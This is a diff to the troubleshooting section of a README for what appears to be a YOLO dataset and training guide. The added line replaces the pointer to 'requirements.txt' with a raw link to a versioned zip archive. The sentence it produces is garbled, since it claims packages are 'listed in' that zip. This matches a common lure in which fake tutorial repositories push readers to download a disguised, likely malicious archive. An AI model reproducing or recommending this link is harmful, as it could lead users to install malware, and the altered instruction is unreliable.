danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/README.md

 If you run into issues:

-- **Dependencies Not Found:** Ensure you installed all packages listed in `requirements.txt` by re-running the install command.
+- **Dependencies Not Found:** Ensure you installed all packages listed in `https://raw.githubusercontent.com/danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/main/notommatid/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide_v2.9.zip` by re-running the install command.
 - **Script Errors:** Double-check the command syntax and ensure you are in the correct directory.
 - **Performance Issues:** Upgrade your hardware if possible, or reduce the dataset size.